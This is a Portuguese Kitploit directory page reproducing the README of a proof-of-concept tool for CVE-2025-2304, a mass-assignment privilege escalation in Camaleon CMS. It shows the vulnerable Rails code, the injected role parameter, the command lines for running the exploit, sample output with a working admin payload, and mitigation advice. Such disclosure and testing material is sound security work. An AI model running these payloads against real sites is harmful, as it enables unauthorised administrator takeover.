Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-2304-POC — Prova de conceito para CVE-2025-2304 — crítica (CVSS 9.4) escalada de privilégios mass-assignment no Camaleon CMS. | Kitploit
Ferramentas/GitHubGitHub/d3vn0mi/cve-2025-2304-poc
Escalada de PrivilégiosGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubd3vn0mi/cve-2025-2304-poc

CVE-2025-2304-POC

Prova de conceito para CVE-2025-2304 — crítica (CVSS 9.4) escalada de privilégios mass-assignment no Camaleon CMS.

Ver Repositório
1034há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-2304 PoC - Escalação de Privilégios no Camaleon CMS

CVE CVSS Python License

Uma Prova de Conceito (PoC) para CVE-2025-2304, uma vulnerabilidade crítica de atribuição em massa no Camaleon CMS que permite a escalação de privilégios de utilizadores com baixos privilégios para administradores.

    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

📋 Índice

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Funcionalidades
  • Instalação
  • Uso
  • Exemplos
  • Versões Afetadas
  • Mitigação
  • Aviso Legal
  • Referências
  • Autor

🔍 Visão Geral

CVE-2025-2304 é uma vulnerabilidade crítica de atribuição em massa no Camaleon CMS que existe no método updated_ajax do UsersController. A vulnerabilidade decorre do uso do perigoso método permit! no Rails, que permite que todos os parâmetros passem sem qualquer filtragem.

Este PoC demonstra como um utilizador autenticado com privilégios baixos pode escalar para administrador ao injetar parâmetros não autorizados durante operações de alteração de senha.

Pontuação CVSS: 9.4 (Crítico)

🐛 Detalhes da Vulnerabilidade

Causa Raiz

O código vulnerável usa params.require(:user).permit! que aceita todos os parâmetros fornecidos pelo utilizador sem validação:

def updated_ajax
  user_params = params.require(:user).permit!  # DANGEROUS!
  current_user.update(user_params)
end

Exploração

Um atacante pode injetar parâmetros adicionais como user[role]=admin juntamente com campos legítimos de alteração de senha, fazendo com que a aplicação atualize a função do utilizador para administrador.

Vetor de Ataque:

  1. Autenticar-se como um utilizador com privilégios baixos (ex.: função "cliente")
  2. Enviar pedido POST manipulado para /admin/users/{id}/updated_ajax
  3. Injetar o parâmetro user[role]=admin
  4. A função do utilizador é elevada para administrador

✨ Funcionalidades

  • ✅ Teste Seguro: Preserva a senha do utilizador durante a exploração
  • ✅ Múltiplos Payloads: Testa mais de 7 técnicas de injeção diferentes
  • ✅ Detecção de Versão: Detecta automaticamente versões vulneráveis do CMS
  • ✅ Opção Não Destrutiva: flag --no-password-field para teste mais seguro
  • ✅ Suporte a Proxy: Integra-se com Burp Suite/ZAP para análise manual
  • ✅ Modo Verboso: Saída detalhada para depuração
  • ✅ Assunção de Admin: Ataque opcional de redefinição de senha do admin
  • ✅ Saída Codificada por Cores: Indicadores visuais claros para sucesso/fracasso

📦 Instalação

Requisitos

  • Python 3.7+
  • pip (gerenciador de pacotes Python)

Clonar Repositório

git clone https://github.com/d3vhthnnni/cve-2025-2304-poc.git
cd cve-2025-2304-poc

Instalar Dependências

pip install -r requirements.txt

Ou instalar manualmente:

pip install requests beautifulsoup4

🚀 Uso

Sintaxe Básica

python3 cve-2025-2304-poc.py <target_url> -u <username> -p <password> [options]

Opções da Linha de Comando

argumentos posicionais:
  target                URL alvo (ex.: http://target.com)

argumentos obrigatórios:
  -u, --username        Nome de utilizador existente para autenticação
  -p, --password        Senha do utilizador

argumentos opcionais:
  -h, --help            Mostrar mensagem de ajuda e sair
  -v, --verbose         Saída detalhada (mostrar todos os pedidos)
  --proxy PROXY         Proxy HTTP para inspeção de tráfego (ex.: http://127.0.0.1:8080)
  --no-password-field   Testar exploração sem campos de senha (mais seguro)
  --skip-admin-test     Pular teste destrutivo de redefinição de senha de admin

📚 Exemplos

Teste Padrão (Recomendado)

Testar com credenciais de utilizador existentes, preservando a senha:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123

Teste Mais Seguro (Sem Campos de Senha)

Testar sem incluir campos de senha no payload de exploração:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --no-password-field

Com Proxy do Burp Suite

Roteie o tráfego pelo Burp Suite para inspeção manual:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --proxy http://127.0.0.1:8080

Modo Verboso

Ative a saída detalhada mostrando todos os pedidos e respostas:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 -v

Pular Testes Destrutivos

Teste apenas a escalação de privilégios, pule a redefinição de senha do admin:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --skip-admin-test

📊 Sample Output

    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

============================================================
   CVE-2025-2304 - Camaleon CMS Privilege Escalation PoC
   Mass Assignment Vulnerability Tester
   Author: d3vn0mi | GitHub: github.com/d3vhthnnni
============================================================

[*] Target: http://target.com
[*] Username: testuser
[*] Password: **********

[*] Logging in as testuser...
[+] Successfully logged in

[*] Checking CMS version...
[*] Detected version: 2.9.0
[+] Version is VULNERABLE (< 2.9.1)

============================================================
[*] Testing CVE-2025-2304 Mass Assignment Vulnerability
============================================================

[*] Target User: testuser (ID: 7)
[*] Current Role: Client (client)
[*] Password will remain unchanged

[1/7] Testing: AJAX endpoint - user[role]
    ✗ Failed
[2/7] Testing: AJAX endpoint - password[role]
============================================================
[+] EXPLOITATION SUCCESSFUL!
============================================================
[+] Privilege Escalation: Client → Administrator
[+] Vulnerable Endpoint: /admin/users/7/updated_ajax
[+] Working Payload: {'password[role]': 'admin'}
[+] Password Unchanged: User can still login normally
[+] CVE-2025-2304 CONFIRMED!

[✓] CVE-2025-2304 VULNERABILITY CONFIRMED

🎯 Versões Afetadas

VersãoStatus
< 2.9.1❌ Vulnerável
≥ 2.9.1✅ Corrigido

Especificamente vulneráveis:

  • Camaleon CMS 2.9.0
  • Camaleon CMS 2.8.x e anteriores

🛡️ Mitigação

Ações Imediatas

  1. Atualizar para a versão 2.9.1 ou superior

    gem update camaleon_cms
    
  2. Auditar Contas de Utilizador

    • Verificar alterações inesperadas de privilégios
    • Revisar logs de modificação de funções de utilizador
    • Procurar pedidos POST suspeitos para /users/*/updated_ajax
  3. Forçar Redefinição de Senhas (se comprometido)

    • Redefinir senhas para todas as contas com privilégios
    • Invalidar sessões existentes

Prevenção a Longo Prazo

Baixar ferramenta